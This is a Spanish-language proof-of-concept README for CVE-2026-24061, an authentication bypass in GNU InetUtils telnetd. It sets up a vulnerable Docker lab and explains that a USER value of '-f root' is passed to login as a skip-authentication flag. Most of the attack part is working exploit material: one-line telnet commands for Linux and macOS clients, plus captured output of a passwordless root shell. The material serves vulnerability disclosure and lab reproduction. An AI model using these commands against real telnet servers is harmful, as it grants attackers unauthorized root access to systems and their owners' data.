
GNU telnetd servicio de GNU InetUtils omisión de autenticación
En enero de 2026, se descubrió que el servicio GNU telnetd de GNU InetUtils era vulnerable a un bypass de autenticación por Kyu Neushwaistein (alias Carlos Cortes Alvarez). Registrada como CVE-2026-24061, esta falla permite a un atacante establecer una sesión Telnet sin proporcionar credenciales válidas, otorgando acceso no autorizado al sistema objetivo. La vulnerabilidad existe hasta la versión 2.7-2 del servicio GNU telnetd y parece sacada directamente de los años 90.
Esta es una vulnerabilidad de inyección de argumentos (CWE-88) con una puntuación CVSS v3.1 de 9.8 (Crítica).
Referencias:
Compilar y ejecutar:
docker build -t telnetd-cve-2026-24061 .
docker run --rm -it -p 23:23 telnetd-cve-2026-24061
Después de que el servicio se inicie, telnetd estará escuchando en el puerto 23.
La vulnerabilidad permite omitir la autenticación inyectando el indicador -f en la variable de entorno USER. Cuando telnetd recibe un nombre de usuario que comienza con -f, lo pasa al programa de inicio de sesión, que interpreta -f como un indicador para omitir la autenticación.
Use el siguiente comando para explotar esta vulnerabilidad y obtener acceso root:
# Cliente Linux (requiere la opción -a)
USER="-f root" telnet -a 127.0.0.1 23
# Cliente macOS (no se necesita la opción -a)
USER="-f root" telnet 127.0.0.1 23
Después de una explotación exitosa, tendrá acceso a un shell root sin proporcionar una contraseña.
$ USER='-f root' telnet -a localhost 23
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
Linux 6.14.0-37-generic (4dbc1b976c10) (pts/1)
Linux 4dbc1b976c10 6.14.0-37-generic #37~24.04.1-Ubuntu SMP PREEMPT_DYNAMIC Thu Nov 20 10:25:38 UTC 2 x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
root@4dbc1b976c10:~# id
uid=0(root) gid=0(root) groups=0(root)